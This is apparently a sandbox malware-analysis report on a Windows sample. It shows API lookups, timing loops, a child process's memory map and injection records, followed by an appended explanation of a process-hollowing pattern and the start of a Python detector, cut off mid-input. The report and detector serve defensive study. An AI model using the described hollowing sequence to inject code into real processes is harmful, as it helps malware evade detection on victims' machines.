Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x75a7f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x75a7d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x75a7d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x752d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 246685852 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1
Fn
Window Create window_name = RadixSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = MergeSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = QuickSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:36 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 266808 True 4
Fn
System Get Time type = Ticks, time = 266824 True 10
Fn
System Get Time type = Ticks, time = 266839 True 12
Fn
System Get Time type = Ticks, time = 266855 True 3
Fn
System Get Time type = Ticks, time = 266870 True 9
Fn
System Get Time type = Ticks, time = 266886 True 1
Fn
System Get Time type = Ticks, time = 266902 True 2
Fn
System Get Time type = Ticks, time = 266917 True 2
Fn
System Get Time type = Ticks, time = 266933 True 9
Fn
System Get Time type = Ticks, time = 266948 True 6
Fn
System Get Time type = Ticks, time = 266964 True 2
Fn
System Get Time type = Ticks, time = 266980 True 1
Fn
System Get Time type = Ticks, time = 268306 True 1
Fn
System Get Time type = Ticks, time = 268321 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268384 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268493 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268602 True 1
Fn
System Get Time type = Ticks, time = 268696 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268711 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268742 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268774 True 1
Fn
System Get Time type = Ticks, time = 268836 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268852 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268867 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268883 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268898 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268914 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268961 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268992 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 269008 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 269117 True 5
Fn
System Get Time type = Ticks, time = 269148 True 5
Fn
System Get Time type = Ticks, time = 269164 True 17
Fn
System Get Time type = Ticks, time = 269179 True 3
Fn
System Get Time type = Ticks, time = 269226 True 5
Fn
System Get Time type = Ticks, time = 269382 True 5
Fn
System Get Time type = Ticks, time = 269507 True 5
Fn
System Get Time type = Ticks, time = 269522 True 1
Fn
System Get Time type = Ticks, time = 269569 True 4
Fn
System Get Time type = Ticks, time = 269616 True 5
Fn
System Get Time type = Ticks, time = 269632 True 1
Fn
System Get Time type = Ticks, time = 269663 True 4
Fn
System Get Time type = Ticks, time = 269710 True 5
Fn
System Get Time type = Ticks, time = 269756 True 5
Fn
System Get Time type = Ticks, time = 269803 True 5
Fn
System Get Time type = Ticks, time = 269850 True 5
Fn
System Get Time type = Ticks, time = 269959 True 5
Fn
System Get Time type = Ticks, time = 270037 True 5
Fn
System Get Time type = Ticks, time = 270100 True 5
Fn
System Get Time type = Ticks, time = 270146 True 5
Fn
System Get Time type = Ticks, time = 270193 True 5
Fn
System Get Time type = Ticks, time = 270224 True 5
Fn
System Get Time type = Ticks, time = 270287 True 5
Fn
System Get Time type = Ticks, time = 270334 True 5
Fn
System Get Time type = Ticks, time = 270380 True 5
Fn
System Get Time type = Ticks, time = 270427 True 5
Fn
System Get Time type = Ticks, time = 270474 True 5
Fn
System Get Time type = Ticks, time = 270521 True 5
Fn
System Get Time type = Ticks, time = 270583 True 5
Fn
System Get Time type = Ticks, time = 270646 True 1
Fn
System Get Time type = Ticks, time = 270739 True 4
Fn
System Get Time type = Ticks, time = 270786 True 5
Fn
System Get Time type = Ticks, time = 270833 True 5
Fn
System Get Time type = Ticks, time = 270880 True 5
Fn
System Get Time type = Ticks, time = 270926 True 5
Fn
System Get Time type = Ticks, time = 270973 True 5
Fn
System Get Time type = Ticks, time = 271020 True 5
Fn
System Get Time type = Ticks, time = 271067 True 5
Fn
System Get Time type = Ticks, time = 271114 True 5
Fn
System Get Time type = Ticks, time = 271160 True 5
Fn
System Get Time type = Ticks, time = 271207 True 5
Fn
System Get Time type = Ticks, time = 271254 True 5
Fn
System Get Time type = Ticks, time = 271301 True 5
Fn
System Get Time type = Ticks, time = 271348 True 5
Fn
System Get Time type = Ticks, time = 271394 True 5
Fn
System Get Time type = Ticks, time = 271441 True 5
Fn
System Get Time type = Ticks, time = 271488 True 5
Fn
System Get Time type = Ticks, time = 271535 True 5
Fn
System Get Time type = Ticks, time = 271582 True 5
Fn
System Get Time type = Ticks, time = 271628 True 5
Fn
System Get Time type = Ticks, time = 271675 True 5
Fn
System Get Time type = Ticks, time = 271722 True 5
Fn
System Get Time type = Ticks, time = 271738 True 5
Fn
System Get Time type = Ticks, time = 271769 True 5
Fn
System Get Time type = Ticks, time = 271800 True 1
Fn
System Get Time type = Ticks, time = 271831 True 4
Fn
System Get Time type = Ticks, time = 271878 True 5
Fn
System Get Time type = Ticks, time = 271925 True 5
Fn
System Get Time type = Ticks, time = 271972 True 5
Fn
System Get Time type = Ticks, time = 272018 True 5
Fn
System Get Time type = Ticks, time = 272065 True 10
Fn
System Get Time type = Ticks, time = 272112 True 5
Fn
System Get Time type = Ticks, time = 272190 True 5
Fn
System Get Time type = Ticks, time = 272237 True 50
Fn
System Get Time type = Ticks, time = 272252 True 30
Fn
System Get Time type = Ticks, time = 272284 True 5
Fn
System Get Time type = Ticks, time = 272299 True 5
Fn
System Get Time type = Ticks, time = 272330 True 15
Fn
System Get Time type = Ticks, time = 272362 True 15
Fn
System Get Time type = Ticks, time = 272377 True 5
Fn
System Get Time type = Ticks, time = 272455 True 10
Fn
System Get Time type = Ticks, time = 272471 True 5
Fn
System Get Time type = Ticks, time = 272486 True 20
Fn
System Get Time type = Ticks, time = 272502 True 10
Fn
System Get Time type = Ticks, time = 272518 True 25
Fn
System Get Time type = Ticks, time = 272533 True 20
Fn
System Get Time type = Ticks, time = 272549 True 25
Fn
System Get Time type = Ticks, time = 272564 True 45
Fn
System Get Time type = Ticks, time = 272580 True 30
Fn
System Get Time type = Ticks, time = 272596 True 30
Fn
System Get Time type = Ticks, time = 272611 True 30
Fn
System Get Time type = Ticks, time = 272627 True 6
Fn
System Get Time type = Ticks, time = 272642 True 39
Fn
System Get Time type = Ticks, time = 272658 True 35
Fn
System Get Time type = Ticks, time = 272674 True 20
Fn
System Get Time type = Ticks, time = 272736 True 15
Fn
System Get Time type = Ticks, time = 272752 True 25
Fn
System Get Time type = Ticks, time = 272767 True 10
Fn
System Get Time type = Ticks, time = 272783 True 11
Fn
System Get Time type = Ticks, time = 272798 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:44 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 272814 True 5
Fn
System Get Time type = Ticks, time = 272830 True 1
Fn
System Get Time type = Ticks, time = 272845 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:44 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 272923 True 5
Fn
System Get Time type = Ticks, time = 272939 True 5
Fn
System Get Time type = Ticks, time = 272954 True 5
Fn
System Get Time type = Ticks, time = 272970 True 5
Fn
System Get Time type = Ticks, time = 273017 True 5
Fn
System Get Time type = Ticks, time = 273032 True 1
Fn
System Get Time type = Ticks, time = 273048 True 4
Fn
System Get Time type = Ticks, time = 273064 True 5
Fn
System Get Time type = Ticks, time = 273095 True 5
Fn
System Get Time type = Ticks, time = 273142 True 5
Fn
System Get Time type = Ticks, time = 273173 True 5
Fn
System Get Time type = Ticks, time = 273220 True 5
Fn
System Get Time type = Ticks, time = 273266 True 5
Fn
System Get Time type = Ticks, time = 273360 True 5
Fn
System Get Time type = Ticks, time = 273376 True 5
Fn
System Get Time type = Ticks, time = 273391 True 20
Fn
System Get Time type = Ticks, time = 273407 True 25
Fn
System Get Time type = Ticks, time = 273422 True 65
Fn
System Get Time type = Ticks, time = 273438 True 15
Fn
System Get Time type = Ticks, time = 273454 True 15
Fn
System Get Time type = Ticks, time = 273469 True 15
Fn
System Get Time type = Ticks, time = 273485 True 25
Fn
System Get Time type = Ticks, time = 273500 True 15
Fn
System Get Time type = Ticks, time = 273516 True 20
Fn
System Get Time type = Ticks, time = 273532 True 5
Fn
System Get Time type = Ticks, time = 273547 True 25
Fn
System Get Time type = Ticks, time = 273563 True 10
Fn
System Get Time type = Ticks, time = 273610 True 5
Fn
System Get Time type = Ticks, time = 273656 True 5
Fn
System Get Time type = Ticks, time = 273703 True 5
Fn
System Get Time type = Ticks, time = 273734 True 5
Fn
System Get Time type = Ticks, time = 273750 True 15
Fn
System Get Time type = Ticks, time = 273766 True 5
Fn
System Get Time type = Ticks, time = 273781 True 5
Fn
System Get Time type = Ticks, time = 273812 True 1
Fn
System Get Time type = Ticks, time = 273828 True 4
Fn
System Get Time type = Ticks, time = 273859 True 5
Fn
System Get Time type = Ticks, time = 273875 True 5
Fn
System Get Time type = Ticks, time = 273906 True 5
Fn
System Get Time type = Ticks, time = 273953 True 5
Fn
System Get Time type = Ticks, time = 273968 True 1
Fn
System Get Time type = Ticks, time = 273984 True 4
Fn
System Get Time type = Ticks, time = 274000 True 5
Fn
System Get Time type = Ticks, time = 274031 True 5
Fn
System Get Time type = Ticks, time = 274046 True 10
Fn
System Get Time type = Ticks, time = 274062 True 5
Fn
System Get Time type = Ticks, time = 274078 True 5
Fn
System Get Time type = Ticks, time = 274093 True 5
Fn
System Get Time type = Ticks, time = 274109 True 5
Fn
System Get Time type = Ticks, time = 274124 True 10
Fn
System Get Time type = Ticks, time = 274140 True 5
Fn
System Get Time type = Ticks, time = 274156 True 5
Fn
System Get Time type = Ticks, time = 274171 True 5
Fn
System Get Time type = Ticks, time = 274187 True 5
Fn
System Get Time type = Ticks, time = 274202 True 5
Fn
System Get Time type = Ticks, time = 274218 True 10
Fn
System Get Time type = Ticks, time = 274234 True 5
Fn
System Get Time type = Ticks, time = 274249 True 5
Fn
System Get Time type = Ticks, time = 274265 True 20
Fn
System Get Time type = Ticks, time = 274280 True 40
Fn
System Get Time type = Ticks, time = 274296 True 40
Fn
System Get Time type = Ticks, time = 274312 True 35
Fn
System Get Time type = Ticks, time = 274327 True 40
Fn
System Get Time type = Ticks, time = 274343 True 35
Fn
System Get Time type = Ticks, time = 274358 True 40
Fn
System Get Time type = Ticks, time = 274374 True 35
Fn
System Get Time type = Ticks, time = 274390 True 40
Fn
System Get Time type = Ticks, time = 274405 True 30
Fn
System Get Time type = Ticks, time = 274421 True 20
Fn
System Get Time type = Ticks, time = 274436 True 33
Fn
System Get Time type = Ticks, time = 274452 True 37
Fn
System Get Time type = Ticks, time = 274468 True 40
Fn
System Get Time type = Ticks, time = 274483 True 23
Fn
System Get Time type = Ticks, time = 274499 True 16
Fn
System Get Time type = Ticks, time = 274514 True 16
Fn
System Get Time type = Ticks, time = 274530 True 16
Fn
System Get Time type = Ticks, time = 274546 True 16
Fn
System Get Time type = Ticks, time = 274561 True 16
Fn
System Get Time type = Ticks, time = 274577 True 16
Fn
System Get Time type = Ticks, time = 274592 True 10
Fn
Process #14: oyvgkgw.exe
27 0
Information Value
ID #14
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x62c
Parent PID 0x64 (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x708
0x148
0x9BC
0x9B8
0x9B4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x0011ffff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x0021ffff Private Memory Readable, Writable True False False -
locale.nls 0x00220000 0x00286fff Memory Mapped File Readable False False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000400000 0x00400000 0x0043cfff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000450000 0x00450000 0x00450fff Pagefile Backed Memory Readable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x0cc50000 0x0cc8bfff Memory Mapped File Readable False False False -
private_0x000000000cc50000 0x0cc50000 0x0cc8ffff Private Memory Readable, Writable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccc0000 0x0ccc0000 0x0ce40fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce50000 0x0ce50000 0x0e24ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e250000 0x0e250000 0x0e65ffff Pagefile Backed Memory Readable, Writable True False False -
sortdefault.nls 0x0e250000 0x0e51efff Memory Mapped File Readable False False False -
pagefile_0x000000000e520000 0x0e520000 0x0e92ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e520000 0x0e520000 0x0e58ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e590000 0x0e590000 0x0e66efff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e660000 0x0e660000 0x0ea6ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e670000 0x0e670000 0x0e76ffff Private Memory Readable, Writable True False False -
private_0x000000000e770000 0x0e770000 0x0e7affff Private Memory Readable, Writable True False False -
private_0x000000000e7b0000 0x0e7b0000 0x0e8affff Private Memory Readable, Writable True False False -
private_0x000000000e8b0000 0x0e8b0000 0x0e8effff Private Memory Readable, Writable True False False -
private_0x000000000e8f0000 0x0e8f0000 0x0e9effff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ed3ffff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
comsvcs.dll 0x74c10000 0x74d45fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x400000, size = 512 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x43c000, size = 512 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x401000, size = 239104 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x7efde008, size = 4 True 1
Modify Control Flow #9: c:\programdata\oyvgkgw.exe 0x89c os_tid = 0x708, address = 0x77bf01c4 True 1
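The five records above match the process-hollowing pattern: a 512-byte write at the target's image base 0x400000 (the PE header), a 512-byte write at 0x43c000 and a 239104-byte write at 0x401000 (section data, all inside the target's Readable, Writable, Executable region 0x00400000-0x0043cfff listed above), a 4-byte write at 0x7efde008, which is offset 8 of the 32-bit PEB at 0x7efde000 and therefore PEB.ImageBaseAddress, and only then a change of thread 0x708's control flow. The new address, 0x77bf01c4, lies inside the 32-bit ntdll.dll mapped at 0x77be0000 in the target, so a detector cannot rely on the hijacked instruction pointer landing in the injected image; it has to key on the ordering of the records and on the PEB patch. As an added example that is not part of this VMRay report, the Python below parses rows in the report's own layout and scores them against that pattern. The row text is reproduced as constructed input, the image range and PEB address are taken from the target's region list, and the verdict and confidence labels are this example's own convention.

```python
import re

# The five injection records of this report, reproduced as constructed input
# in the report's own row layout so the parser can be exercised offline.
INJECTION_LOG = r"""
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x400000, size = 512 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x43c000, size = 512 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x401000, size = 239104 True 1
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x7efde008, size = 4 True 1
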